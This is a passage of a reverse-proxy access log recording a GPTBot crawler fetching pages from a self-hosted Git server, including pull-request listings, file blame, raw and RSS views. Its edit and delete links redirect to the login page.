-[17/Feb/2026:17:24:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10033] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:17:24:13 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresPatrol/.python-version" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/.python-version" -[17/Feb/2026:17:24:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresPatrol/.python-version" -[17/Feb/2026:17:24:14 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/Old_GoldMonitor.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/Old_GoldMonitor.py" -[17/Feb/2026:17:24:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/Old_GoldMonitor.py" -[17/Feb/2026:17:24:14 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/Old_GoldMonitor.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/Old_GoldMonitor.py" -[17/Feb/2026:17:24:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/Old_GoldMonitor.py" -[17/Feb/2026:17:24:15 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresPatrol/.python-version" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/.python-version" -[17/Feb/2026:17:24:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresPatrol/.python-version" -[17/Feb/2026:17:24:16 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/GoldBar.png" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldBar.png" -[17/Feb/2026:17:24:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/GoldBar.png" -[17/Feb/2026:17:24:16 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/GoldBar.png" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldBar.png" -[17/Feb/2026:17:24:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/GoldBar.png" -[17/Feb/2026:17:24:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresPatrol/.python-version" [Client 74.7.227.38] [Length 9842] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/.python-version" -[17/Feb/2026:17:24:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/Old_GoldMonitor.py" [Client 74.7.227.38] [Length 9788] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/Old_GoldMonitor.py" -[17/Feb/2026:17:24:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/GoldBar.png" [Client 74.7.227.38] [Length 9786] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldBar.png" -[17/Feb/2026:17:24:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/PostgresPatrol/.python-version" [Client 74.7.227.38] [Length 10168] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/.python-version" -[17/Feb/2026:17:24:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10029] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&sort=leastcomment&state=open&type=all" -[17/Feb/2026:17:24:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10056] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:17:24:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/PostgresPatrol/watchdog_final_org.py" [Client 74.7.227.38] [Length 36475] [Gzip 15.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog_final_org.py" -[17/Feb/2026:17:24:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/Old_GoldMonitor.py" [Client 74.7.227.38] [Length 14631] [Gzip 7.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/Old_GoldMonitor.py" -[17/Feb/2026:17:24:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10046] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:17:24:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresPatrol/watchdog_final_org.py" [Client 74.7.227.38] [Length 18096] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog_final_org.py" -[17/Feb/2026:17:24:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresPatrol/watchdog_final_org.py" [Client 74.7.227.38] [Length 1005] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog_final_org.py" -[17/Feb/2026:17:24:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/Old_GoldMonitor.py" [Client 74.7.227.38] [Length 2967] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/Old_GoldMonitor.py" -[17/Feb/2026:17:24:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresPatrol/.python-version" [Client 74.7.227.38] [Length 993] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/.python-version" -[17/Feb/2026:17:24:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresPatrol/.python-version" [Client 74.7.227.38] [Length 7] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/.python-version" -[17/Feb/2026:17:24:24 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresPatrol/.python-version" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/.python-version" -[17/Feb/2026:17:24:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresPatrol/.python-version" -[17/Feb/2026:17:24:25 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresPatrol/.python-version" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/.python-version" -[17/Feb/2026:17:24:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresPatrol/.python-version" -[17/Feb/2026:17:24:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10053] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:17:24:26 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresPatrol/watchdog_final_org.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/watchdog_final_org.py" -[17/Feb/2026:17:24:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresPatrol/watchdog_final_org.py" -[17/Feb/2026:17:24:26 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/Old_GoldMonitor.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/Old_GoldMonitor.py" -[17/Feb/2026:17:24:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/Old_GoldMonitor.py" -[17/Feb/2026:17:24:27 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/Old_GoldMonitor.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/Old_GoldMonitor.py" -[17/Feb/2026:17:24:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/Old_GoldMonitor.py" -[17/Feb/2026:17:24:27 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresPatrol/watchdog_final_org.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/watchdog_final_org.py" -[17/Feb/2026:17:24:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresPatrol/watchdog_final_org.py" -[17/Feb/2026:17:24:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10056] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&sort=oldest&state=open&type=all" -[17/Feb/2026:17:24:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&sort=oldest&state=open&type=all" -[17/Feb/2026:17:24:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/GoldBar.png" [Client 74.7.227.38] [Length 856] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldBar.png" -[17/Feb/2026:17:24:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/Old_GoldMonitor.py" [Client 74.7.227.38] [Length 870] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/Old_GoldMonitor.py" -[17/Feb/2026:17:24:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/env.example.txt" [Client 74.7.227.38] [Length 12297] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol" -[17/Feb/2026:17:24:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/calculator.py" [Client 74.7.227.38] [Length 13067] [Gzip 3.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot" -[17/Feb/2026:17:24:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/MIGRATION_GUIDE.md?display=rendered" [Client 74.7.227.38] [Length 16048] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/MIGRATION_GUIDE.md" -[17/Feb/2026:17:24:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/DOCKER_QUICKSTART.md?display=source" [Client 74.7.227.38] [Length 18373] [Gzip 5.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/DOCKER_QUICKSTART.md" -[17/Feb/2026:17:24:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Services.tsx?display=source" [Client 74.7.227.38] [Length 14710] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Services.tsx" -[17/Feb/2026:17:24:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Footer.tsx?display=rendered" [Client 74.7.227.38] [Length 10950] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Footer.tsx" -[17/Feb/2026:17:24:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/TestService.csproj?display=rendered" [Client 74.7.227.38] [Length 11160] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/TestService.csproj" -[17/Feb/2026:17:24:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10055] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&sort=oldest&state=closed&type=all" -[17/Feb/2026:17:24:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10030] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&sort=oldest&state=open&type=all" -[17/Feb/2026:17:24:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10030] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&sort=leastcomment&state=open&type=all" -[17/Feb/2026:17:24:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10033] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:17:24:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresPatrol/env.example.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/env.example.txt" -[17/Feb/2026:17:24:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresPatrol/env.example.txt" -[17/Feb/2026:17:24:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresPatrol/env.example.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/env.example.txt" -[17/Feb/2026:17:24:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresPatrol/env.example.txt" -[17/Feb/2026:17:24:37 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/calculator.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/calculator.py" -[17/Feb/2026:17:24:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/calculator.py" -[17/Feb/2026:17:24:37 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/calculator.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/calculator.py" -[17/Feb/2026:17:24:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/calculator.py" -[17/Feb/2026:17:24:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresPatrol/env.example.txt" [Client 74.7.227.38] [Length 9843] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; 